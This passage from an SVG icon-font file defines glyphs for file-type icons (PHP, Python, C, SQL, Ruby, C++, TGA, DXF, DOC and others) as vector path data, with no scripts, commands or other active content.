63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448.156 448h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM640 416v-192h32v192h64v32h-160v-32h64zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xecf1;" glyph-name="document-file-ots2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448.156 448c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM640 416v-192h32v192h64v32h-160v-32h64zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xecf2;" glyph-name="document-file-php" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM704 352v96h32v-224h-32v96h-96v-96h-32v224h32v-96h96zM768 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecf3;" glyph-name="document-file-php2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM704 352h-96v96h-32v-224h32v96h96v-96h32v224h-32v-96zM768 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecf4;" glyph-name="document-file-py" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h159.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-159.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-351.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h351.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM287.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM672 320v-96h-32v96l-64 96v32h32v-32l48-72 48 72v32h32v-32l-64-96z" />
<glyph unicode="&#xecf5;" glyph-name="document-file-py2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-383.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h383.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM287.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM672 320l64 96v32h-32v-32l-48-72-48 72v32h-32v-32l64-96v-96h32v96z" />
<glyph unicode="&#xecf6;" glyph-name="document-file-c" d="M672 544h223.781c53.467 0 96.219-42.963 96.219-95.961v-224.078c0-53.009-43.079-95.961-96.219-95.961h-223.781v-64.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224v-96zM640 128h-287.781c-53.467 0-96.219 42.963-96.219 95.961v224.078c0 53.009 43.079 95.961 96.219 95.961h287.781v64h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v64.211zM480 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM351.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM704 288c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006z" />
<glyph unicode="&#xecf7;" glyph-name="document-file-c2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-319.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h319.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM351.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM704 288c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006z" />
<glyph unicode="&#xecf8;" glyph-name="document-file-sql" d="M661.621 227.752l28.321-28.321 22.627 22.627-24.102 24.102c9.681 11.209 15.533 25.86 15.533 42.029v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c7.645 0 14.978 1.321 21.777 3.752zM633.373 256h-25.406c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-31.994v-96.012c0-7.183-2.332-13.779-6.274-19.093l-43.668 43.668-22.627-22.627 33.941-33.941zM672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h223.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-223.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM351.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM416.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM896 256v-32h-160v224h32v-192h128z" />
<glyph unicode="&#xecf9;" glyph-name="document-file-sql2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-319.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h319.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM351.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM661.621 227.752c-6.799-2.431-14.132-3.752-21.777-3.752h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-16.169-5.853-30.82-15.533-42.029l24.102-24.102-22.627-22.627-28.321 28.321zM633.373 256h-25.406c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-31.994v-96.012c0-7.183-2.332-13.779-6.274-19.093l-43.668 43.668-22.627-22.627 33.941-33.941zM416.156 448h31.688c35.551 0 64.156-28.654 64.156-64h-32c0 17.498-14.312 32-31.967 32h-32.067c-17.801 0-31.967-14.327-31.967-32 0-17.796 14.461-32 32.3-32h31.7c35.593 0 64-28.654 64-64 0-35.593-28.724-64-64.156-64h-31.688c-35.551 0-64.156 28.669-64.156 64.035v0.184h32v-0.362c0-17.256 14.312-31.857 31.967-31.857h32.067c17.801 0 31.967 14.327 31.967 32 0 17.796-14.461 32-32.3 32h-31.7c-35.593 0-64 28.654-64 64 0 35.593 28.724 64 64.156 64zM896 256v-32h-160v224h32v-192h128z" />
<glyph unicode="&#xecfa;" glyph-name="document-file-rb" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h223.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-223.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM351.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM505.6 320h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM480 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM640 328v120h95.844c35.551 0 64.156-28.654 64.156-64 0-19.21-8.367-36.327-21.641-48.015 13.274-11.727 21.641-28.878 21.641-47.985 0-35.593-28.724-64-64.156-64h-95.844v104zM672 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM672 320v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecfb;" glyph-name="document-file-rb2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-319.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h319.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM351.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM505.6 320h-25.6v-96h-32v224h95.844c35.551 0 64.156-28.654 64.156-64 0-35.54-28.639-63.916-64-64l64-96h-38.4l-64 96zM480 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM640 328v120h95.844c35.551 0 64.156-28.654 64.156-64 0-19.21-8.367-36.327-21.641-48.015 13.274-11.727 21.641-28.878 21.641-47.985 0-35.593-28.724-64-64.156-64h-95.844v104zM672 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM672 320v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecfc;" glyph-name="document-file-cpp" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM544 288c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006zM576 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM768 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecfd;" glyph-name="document-file-cpp2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM544 288l-32-0.006c0-17.795-14.312-31.994-31.967-31.994h-32.067c-17.801 0-31.967 14.324-31.967 31.994v96.012c0 17.795 14.312 31.994 31.967 31.994h32.067c17.801 0 31.967-14.324 31.967-32h32c-0.102 35.364-28.668 64-64.156 64h-31.688c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.37 0 64.055 28.27 64.156 64zM576 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM768 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033z" />
<glyph unicode="&#xecfe;" glyph-name="document-file-tga" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 416v-192h32v192h64v32h-160v-32h64zM704 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM896 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM831.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067z" />
<glyph unicode="&#xecff;" glyph-name="document-file-tga2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448 416v-192h32v192h64v32h-160v-32h64zM704 320v-64h-64.006c-17.795 0-31.994 14.324-31.994 31.994v96.012c0 17.795 14.324 31.994 31.994 31.994h96.006v32h-95.844c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h95.844v128h-96v-32h64zM896 320v-96h32v160c0 35.346-28.605 64-64.156 64h-31.688c-35.432 0-64.156-28.407-64.156-64v-160h32v96h96zM831.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067z" />
<glyph unicode="&#xed00;" glyph-name="document-file-dxf" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM640 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM384 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM416 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM800 352v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xed01;" glyph-name="document-file-dxf2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM640 336l-64-112h32l48 84 48-84h32l-64 112 64 112h-32l-48-84-48 84h-32l64-112zM384 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM416 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM800 352v64h128v32h-160v-224h32v96h96v32h-96z" />
<glyph unicode="&#xed02;" glyph-name="document-file-doc" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM416 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM640.156 448h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM639.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM928 288c-0.101-35.73-28.786-64-64.156-64h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189h31.688c35.488 0 64.054-28.636 64.156-64h-32c0 17.676-14.165 32-31.967 32h-32.067c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994l32 0.006z" />
